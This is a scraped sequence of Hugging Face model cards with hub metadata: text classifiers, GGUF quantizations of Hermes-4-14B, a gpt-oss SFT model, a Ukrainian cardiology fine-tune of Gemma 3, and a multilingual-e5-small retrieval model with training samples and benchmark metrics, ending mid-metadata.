archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
Neelectric/OLMo-2-1124-7B-Instruct_SFT_alpaca_v00.01
|
Neelectric
| 2025-09-23T12:20:20Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"olmo2",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T12:16:30Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
afnankhth/testooo
|
afnankhth
| 2025-09-23T12:15:20Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:NLP-EXP/QE3",
"base_model:finetune:NLP-EXP/QE3",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T12:13:09Z |
---
library_name: transformers
base_model: NLP-EXP/QE3
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: testooo
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# testooo
This model is a fine-tuned version of [NLP-EXP/QE3](https://huggingface.co/NLP-EXP/QE3) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.8388
- Accuracy: 0.7021
- Weighted F1: 0.6961
- Macro F1: 0.6648
- Weighted Precision: 0.7042
- Weighted Recall: 0.7021
- F1 Class الإقرار: 0.6610
- F1 Class المواساة: 0.6035
- F1 Class التساؤل: 0.9034
- F1 Class الاقتراح: 0.7249
- F1 Class التشجيع: 0.5890
- F1 Class التمني: 0.7583
- F1 Class أخرى: 0.4135
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 1
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | Weighted F1 | Macro F1 | Weighted Precision | Weighted Recall | F1 Class الإقرار | F1 Class المواساة | F1 Class التساؤل | F1 Class الاقتراح | F1 Class التشجيع | F1 Class التمني | F1 Class أخرى |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:-----------:|:--------:|:------------------:|:---------------:|:----------------:|:-----------------:|:----------------:|:-----------------:|:----------------:|:---------------:|:-------------:|
| 0.9164 | 1.0 | 494 | 0.8388 | 0.7021 | 0.6961 | 0.6648 | 0.7042 | 0.7021 | 0.6610 | 0.6035 | 0.9034 | 0.7249 | 0.5890 | 0.7583 | 0.4135 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
poolkiltzn/blockassist-bc-vigilant_alert_tuna_1758629505
|
poolkiltzn
| 2025-09-23T12:13:06Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"vigilant alert tuna",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-23T12:12:51Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- vigilant alert tuna
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
SandLogicTechnologies/Hermes-4-14B-GGUF
|
SandLogicTechnologies
| 2025-09-23T12:13:01Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"Qwen3-14B",
"qwen3",
"hybrid-model",
"chatml",
"function calling",
"Quantization",
"Q4_K_M",
"Q5_K_M",
"tool use",
"json output",
"text-generation",
"en",
"base_model:NousResearch/Hermes-4-14B",
"base_model:quantized:NousResearch/Hermes-4-14B",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] |
text-generation
| 2025-09-22T11:30:34Z |
---
license: apache-2.0
language:
- en
base_model:
- NousResearch/Hermes-4-14B
pipeline_tag: text-generation
library_name: transformers
tags:
- Qwen3-14B
- qwen3
- hybrid-model
- chatml
- function calling
- Quantization
- Q4_K_M
- Q5_K_M
- tool use
- json output
---
# Quantized Hermes-4-14B Model
This repository provides a quantized GGUF version of the Hermes-4-14B model. The 4-bit and 5-bit quantized variants retain the model's strengths in advanced reasoning tasks while reducing memory and compute requirements, making them ideal for efficient inference on resource-constrained devices.
## Model Overview
- **Original Model**: Hermes-4-14B
- **Quantized Version**:
- Q4_K_M (4-bit quantization)
- Q5_K_M (5-bit quantization)
- **Architecture**: Decoder-only transformer
- **Base Model**: Qwen3-14B-Base
- **Modalities**: Text only
- **Developer**: Nous Research
- **License**: [Apache 2.0 License](https://huggingface.co/NousResearch/Hermes-4-14B/blob/main/LICENSE)
- **Language**: English
## Quantization Details
### Q4_K_M Version
- Approx. ~50% size reduction
- Lower memory footprint (~8.35 GB)
- Slight performance degradation in complex reasoning scenarios
### Q5_K_M Version
- Approx. ~59% size reduction
- Lower memory footprint (~9.79 GB)
- Better performance retention, recommended when quality is a priority
## Key Features
- Top-quality, expressive reasoning that improves math, code, STEM, logic, and even creative writing and subjective responses.
- Instruction-following model optimized for multi-turn scientific question answering.
- Schema adherence & structured outputs: trained to produce valid JSON for given schemas and to repair malformed objects.
- Much easier to steer and align: large improvements in steerability, especially reduced refusal rates.
## Usage Example
Text Inference:
```sh
./llama-cli -hf SandLogicTechnologies/Hermes-4-14B-GGUF:Q4_K_M -p "Explain the Fourier Transform in simple terms"
```
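A minimal Python sketch is shown below as an alternative (assumptions: one of the quant files from this repo has been downloaded locally, `llama-cpp-python` is installed, and the file name is a placeholder):
```python
from llama_cpp import Llama  # pip install llama-cpp-python

# Placeholder path to a locally downloaded quant from this repository.
llm = Llama(model_path="Hermes-4-14B.Q4_K_M.gguf", n_ctx=8192)

# create_chat_completion typically applies the chat template stored in the
# GGUF metadata (Hermes 4 uses ChatML-style formatting).
response = llm.create_chat_completion(
    messages=[{"role": "user", "content": "Explain the Fourier Transform in simple terms"}],
    max_tokens=256,
)
print(response["choices"][0]["message"]["content"])
```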
## Recommended Use Cases
- **Scientific reasoning & STEM domains**: tasks requiring step-by-step logical reasoning, clean structure.
- **Coding & software-related tasks**: code generation, explanation, debugging.
- **Chatbots/Assistants**: where reasoning transparency is important (showing chain of thought).
- **Low-resource deployment / edge inference**: use quantized variants.
## Acknowledgments
These quantized models are based on the original work by the **NousResearch** development team.
Special thanks to:
- The [NousResearch](https://huggingface.co/NousResearch) team for developing and releasing the [Hermes-4-14B](https://huggingface.co/NousResearch/Hermes-4-14B) model.
- **Georgi Gerganov** and the entire [`llama.cpp`](https://github.com/ggerganov/llama.cpp) open-source community for enabling efficient model quantization and inference via the GGUF format.
---
## Contact
For any inquiries or support, please contact us at [email protected] or visit our [Website](https://www.sandlogic.com/).
|
bhaveshsoni0023/gpt-oss-20b-multilingual-reasoner
|
bhaveshsoni0023
| 2025-09-23T12:07:41Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"sft",
"trl",
"base_model:openai/gpt-oss-20b",
"base_model:finetune:openai/gpt-oss-20b",
"endpoints_compatible",
"region:us"
] | null | 2025-09-17T22:47:10Z |
---
base_model: openai/gpt-oss-20b
library_name: transformers
model_name: gpt-oss-20b-multilingual-reasoner
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for gpt-oss-20b-multilingual-reasoner
This model is a fine-tuned version of [openai/gpt-oss-20b](https://huggingface.co/openai/gpt-oss-20b).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="bhaveshsoni0023/gpt-oss-20b-multilingual-reasoner", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0.dev20250319+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
uaritm/gemma3_1b_med_uk
|
uaritm
| 2025-09-23T12:06:36Z | 2,532 | 1 | null |
[
"safetensors",
"gguf",
"gemma3_text",
"medical",
"cardiology",
"uk",
"base_model:google/gemma-3-1b-it",
"base_model:quantized:google/gemma-3-1b-it",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-14T19:35:55Z |
---
license: apache-2.0
language:
- uk
base_model:
- google/gemma-3-1b-it
tags:
- medical
- cardiology
---
# Model Information
Summary description and brief definition of inputs and outputs.
# Gemma3 1B Med UK
**⚠️ WARNING: Ethical Agreement Required**
Before using this model, you must read and agree to the [Ethical Use Agreement](ETHICAL_GUIDELINES.md). This model is for research purposes and is not a substitute for professional medical advice.
---
# More about the idea
Every physician knows the challenge of distilling a complex discharge summary into clear, practical recommendations.
It is a process that requires both time and focus, often repeated countless times each day.
The model, which is based on Gemma 3, was fine-tuned not on real patient medical records,
but on synthetically generated data (12,500 discharge summaries in Ukrainian), carefully designed to reproduce the structure
and tone of authentic clinical documentation while ensuring complete anonymity.
These texts were created from artificial templates inspired by anonymized medical records,
ensuring that no personal health data was included. Each synthetic summary was paired with a target field called
"Recommendations", which allowed the model to learn to produce structured results that resemble how doctors write discharge summaries,
while maintaining strict data confidentiality and ethical integrity.
You can find more information in the article at this link: https://medium.com/@uaritm/the-future-of-medicine-how-neural-networks-are-redefining-clinical-practice-c35760229ad9
# Description
The model was trained on medical texts with a cardiological focus. This model is experimental and should not be used under any circumstances to establish a diagnosis or recommend treatment!
For this purpose, please consult a doctor.
# Inputs and outputs
Use the following template when providing input:
Context length 2048
Input: Text string
The model was trained in chat (messages) format. The structure is usually as follows:
messages = [
{"role": "system", "content": "You are a medical assistant. Based on the discharge summary, return strictly valid JSON: {\"Recommendations\": \"<text>\"}. Text in Ukrainian."},
{"role": "user", "content": "Discharge summary: (Text in Ukrainian)"}
]
Output: Text string
Generated text in response to the input, such as an answer to a question.
The model output should be strictly JSON, for example:
{"Recommendations": "It is recommended to ... (Text in Ukrainian)"}
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1).
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
### Training Data
Private
## Citing & Authors
@misc{UARITM,
title={sentence-transformers: Semantic similarity of medical texts ukr, kor, eng},
author={Vitaliy Ostashko},
year={2025},
url={https://ai.esemi.org},
}
<!--- Describe where people can find more information -->
|
Caesarisnotasalad/test
|
Caesarisnotasalad
| 2025-09-23T12:06:06Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"bert",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:100231",
"loss:CachedMultipleNegativesRankingLoss",
"en",
"dataset:sentence-transformers/natural-questions",
"arxiv:1908.10084",
"arxiv:2101.06983",
"base_model:intfloat/multilingual-e5-small",
"base_model:finetune:intfloat/multilingual-e5-small",
"model-index",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T12:05:49Z |
---
language:
- en
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:100231
- loss:CachedMultipleNegativesRankingLoss
base_model: intfloat/multilingual-e5-small
widget:
- source_sentence: who is born on 29 february in india
sentences:
- 'Morarji Desai Morarji Desai (29 February 1896 – 10 April 1995)[1] was an Indian
independence activist and served between 1977 and 1979 as the 4th Prime Minister
of India and led the government formed by the Janata Party. During his long career
in politics, he held many important posts in government such as: Chief Minister
of Bombay State, Home Minister, Finance Minister and 2nd Deputy Prime Minister
of India. On the international scene, Desai holds international fame for his peace
activism and made efforts to initiate peace between two rival South Asian states,
Pakistan and India[citation needed]. After India''s first nuclear explosion in
1974, Desai helped restore friendly relations with China and Pakistan, and vowed
to avoid armed conflict such as Indo-Pakistani war of 1971. He was also accused
of scaling down the Indian covert operations agency, the R&AW.'
- Blues (Super Rugby) The Blues (formerly known as the Auckland Blues until 2000)
are a professional rugby union team based in Auckland, New Zealand who play in
the Super Rugby competition. Like New Zealand's four other Super Rugby regional
franchises, the Blues were established by the NZRU in 1996. One of the most successful
teams in Super Rugby history, the Blues won the competition in each of its first
two seasons, 1996 and 1997, and again in 2003. Additionally, the team were finalists
in 1998 and semi-finalists in 2007 and 2011. The team is captained by James Parsons
and coached by Tana Umaga.
- 'Bryan Callen Callen played Ricky''s sexually abusive father on The Secret Life
of the American Teenager on ABC Family. He also makes frequent appearances on
Chelsea Lately. He hosted the E! show Bank of Hollywood, and currently appears
as a commentator of The Smoking Gun Presents: World''s Dumbest... on truTV.'
- source_sentence: when was the idaho state capitol building built
sentences:
- Idaho State Capitol Construction of the first portion of the capitol building
began in the summer of 1905, 15 years after Idaho gained statehood. Architects
were John E. Tourtellotte and Charles Hummel. Tourtellotte was a Connecticut native
whose career began in Massachusetts and skyrocketed further when he moved to Boise.
Hummel was a German immigrant who partnered with Tourtellotte in 1903. The final
cost of the building was just over $2 million; it was completed in 1920. The architects
used varied materials to construct the building and their design was inspired
by Classical examples.[2]
- 'Shahada Recitation of the shahādah is the most common statement of faith for
Muslims. In Sunni Islam, it is counted as the first of the Five Pillars of Islam,[9]
while the Shi''i Twelvers and Isma''ilis also have the shahada as among their
pillars of faith.[19] It is whispered by the father into the ear of a newborn
child,[9] and it is whispered into the ear of a dying person.[20] The five canonical
daily prayers each include a recitation of the shahada.[17] Recitation of the
shahada in front of witnesses is also the first and only formal step in conversion
to Islam.[9] This occasion often attracts more than the two required witnesses
and sometimes includes a party-like celebration to welcome the convert into their
new faith.[11] In accordance with the central importance played by the notion
of intention (Arabic: نیّة, niyyah) in Islamic doctrine, the recitation of the
shahada must reflect understanding of its import and heartfelt sincerity.[21][22]
Intention is what differentiates acts of devotion from mundane acts and a simple
reading of the shahada from invoking it as a ritual activity.[21][22]'
- Cynthia Nixon Cynthia Ellen Nixon (born April 9, 1966) is an American actress.
She is known for her portrayal of Miranda Hobbes in the HBO series, Sex and the
City (1998–2004), for which she won the 2004 Primetime Emmy Award for Outstanding
Supporting Actress in a Comedy Series. She reprised the role in the films Sex
and the City (2008) and Sex and the City 2 (2010). Other film credits include
Amadeus (1984), The Pelican Brief (1993), Little Manhattan (2005), 5 Flights Up
(2014), James White (2015), and playing Emily Dickinson in A Quiet Passion (2016).
- source_sentence: what is the chemical formula of laughing gas
sentences:
- Adversarial system The adversarial system or adversary system is a legal system
used in the common law countries where two advocates represent their parties'
case or position before an impartial person or group of people, usually a jury
or judge, who attempt to determine the truth and pass judgment accordingly.[1][2][3]
It is in contrast to the inquisitorial system used in some civil law systems (i.e.
those deriving from Roman law or the Napoleonic code) where a judge investigates
the case.
- Mercy (Duffy song) "Mercy" is a song performed by Welsh singer Duffy, released
as the second single from her debut studio album, Rockferry (2008). Co-written
by Duffy and Steve Booker and produced by Booker, it was released worldwide in
2008 to critical acclaim and unprecedented chart success. As Duffy's first international
release, the song is credited with firmly establishing her career and is now considered
her signature song. "Mercy" received comparisons to Duffy's previous single, "Rockferry".
Critical reviewers of "Mercy" noted similarities between the song to releases
by Aretha Franklin, Dusty Springfield and The Supremes, as well as contemporaries
such as fellow British singer Amy Winehouse. "Mercy" peaked at number one on the
UK Singles Chart in February 2008, remaining at the top of the chart for five
weeks. The single also topped the charts in Austria, Germany, Greece, the Netherlands,
Norway, Republic of Ireland, Switzerland and Turkey, and peaked within the top
five of the charts in Belgium, Denmark, France, Italy, Japan, New Zealand, Romania,
Spain and Sweden.
- Nitrous oxide Nitrous oxide, commonly known as laughing gas or nitrous,[1] is
a chemical compound, an oxide of nitrogen with the formula N 2O. At room temperature,
it is a colorless non-flammable gas, with a slightly metallic scent and taste.
At elevated temperatures, nitrous oxide is a powerful oxidizer similar to molecular
oxygen.
- source_sentence: comin thro the rye meaning in catcher in the rye
sentences:
- India and the United Nations India was among the original members of the United
Nations that signed the Declaration by United Nations at Washington, D.C. on 1944
October and also participated in the United Nations Conference on International
Organization at San Francisco from 25 April to 26 June 1945. As a founding member
of the United Nations, India strongly supports the purposes and principles of
the UN and has made significant contributions in implementing the goals of the
Charter, and the evolution of the UN's specialised programmes and agencies.[1]
- Dominion of New Zealand In the post-war period, the term ‘Dominion’ has fallen
into disuse. Full independence was granted with the Statute of Westminster in
1931 and adopted by the New Zealand Parliament in 1947.
- Comin' Thro' the Rye The title of the novel The Catcher in the Rye (1951) by J.
D. Salinger comes from the poem's name. Holden Caulfield, the protagonist, misinterprets
a part of this poem to mean "if a body catch a body" rather than "if a body meet
a body." He keeps picturing children playing in a field of rye near the edge of
a cliff, and him catching them when they start to fall off.[8]
- source_sentence: on what basis did the bishop of rome claim authority over other
bishops
sentences:
- Fifty Shades Darker Christian takes Ana to the boathouse, which has been decorated
with flowers and soft lights. He proposes properly with a ring and Ana accepts.
Outside the Greys' mansion, Jack Hyde secretly watches the party; he is the one
who sabotaged Christian's helicopter and he has sworn revenge.
- Role of the United States in the Vietnam War The role of the United States in
the Vietnam War began after World War II and escalated into full commitment during
the Vietnam War from 1955 to 1975.
- Papal primacy Because of its association with the supposed position of Peter among
the Apostles, the function that, within the Roman Catholic Church, is exercised
by the Bishop of Rome among the bishops as a whole is referred to as the Petrine
function, and is generally believed to be of divine institution, in the sense
that the historical and sociological factors that influenced its development are
seen as guided by the Holy Spirit. Not all Roman Catholic theologians see a special
providential providence as responsible for the result, but most see the papacy,
regardless of its origin, as now essential to the Church's structure.[36]
datasets:
- sentence-transformers/natural-questions
pipeline_tag: sentence-similarity
library_name: sentence-transformers
metrics:
- cosine_accuracy@1
- cosine_accuracy@3
- cosine_accuracy@5
- cosine_accuracy@10
- cosine_precision@1
- cosine_precision@3
- cosine_precision@5
- cosine_precision@10
- cosine_recall@1
- cosine_recall@3
- cosine_recall@5
- cosine_recall@10
- cosine_ndcg@10
- cosine_mrr@10
- cosine_map@100
model-index:
- name: SentenceTransformer based on intfloat/multilingual-e5-small
results:
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoClimateFEVER
type: NanoClimateFEVER
metrics:
- type: cosine_accuracy@1
value: 0.2
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.48
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.6
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.72
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.2
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.18
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.14400000000000002
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.10399999999999998
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.10833333333333332
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.239
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.304
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.41133333333333333
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.31048541932822943
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.3614444444444443
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.2390388256023445
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoDBPedia
type: NanoDBPedia
metrics:
- type: cosine_accuracy@1
value: 0.68
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.9
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.92
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.94
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.68
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.5866666666666667
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.5080000000000001
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.43599999999999994
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.086360244024752
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.1666741847802517
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.21438121403297003
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.3104025438299758
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.5587563085491208
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.7916666666666669
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.40805090985112635
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoFEVER
type: NanoFEVER
metrics:
- type: cosine_accuracy@1
value: 0.66
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.88
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.92
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.98
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.66
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.29333333333333333
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.19199999999999995
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.102
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.6266666666666667
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.8466666666666667
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.9033333333333333
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.9433333333333332
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.8017852113833116
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.7740238095238096
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.7482351489090618
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoFiQA2018
type: NanoFiQA2018
metrics:
- type: cosine_accuracy@1
value: 0.38
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.52
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.56
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.72
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.38
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.2333333333333333
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.16399999999999998
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.10399999999999998
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.19874603174603173
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.3268492063492063
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.3609047619047619
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.49229365079365073
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.3959228015337088
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.47713492063492063
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.33252277939048175
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoHotpotQA
type: NanoHotpotQA
metrics:
- type: cosine_accuracy@1
value: 0.76
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.86
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.92
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.94
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.76
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.4133333333333332
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.284
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.146
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.38
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.62
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.71
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.73
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.702847927278439
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.8262222222222223
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.6449812229887003
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoMSMARCO
type: NanoMSMARCO
metrics:
- type: cosine_accuracy@1
value: 0.38
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.56
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.64
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.88
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.38
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.18666666666666668
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.128
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.088
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.38
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.56
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.64
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.88
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.5942056677784402
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.5074603174603174
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.5145092026709674
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoNFCorpus
type: NanoNFCorpus
metrics:
- type: cosine_accuracy@1
